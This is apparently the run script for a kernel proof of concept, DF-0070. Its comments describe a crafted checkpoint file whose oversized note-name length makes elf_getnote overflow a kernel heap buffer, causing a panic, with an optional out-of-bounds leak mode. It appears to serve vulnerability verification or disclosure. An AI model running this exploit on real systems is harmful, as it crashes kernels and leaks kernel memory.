DF-0070 / run.sh
#!/bin/sh # DF-0070 PoC run -- exact run invocation used during verification. # # Default (panic) mode: builds evil.ckpt and calls sys_checkpoint(CKPT_THAW) # on it; the crafted n_namesz=0x10000000 drives elf_getnote's bcopy 256 MB # past the kmalloc(880) note buffer, hitting unmapped KVM -> kernel panic # (Fatal trap 12 page fault in memmove/bcopy). Default ckptgroup=0 makes # this wheel-only, so run as root. # # Optional "leak" mode (slab-adjacent 116-byte OOB; usually silent EINVAL): # ./run.sh leak set -e cd "$(dirname "$0")" MODE="${1:-panic}" echo "+ ./df0070 evil.ckpt $MODE" ./df0070 evil.ckpt "$MODE" echo "RUN_OK" |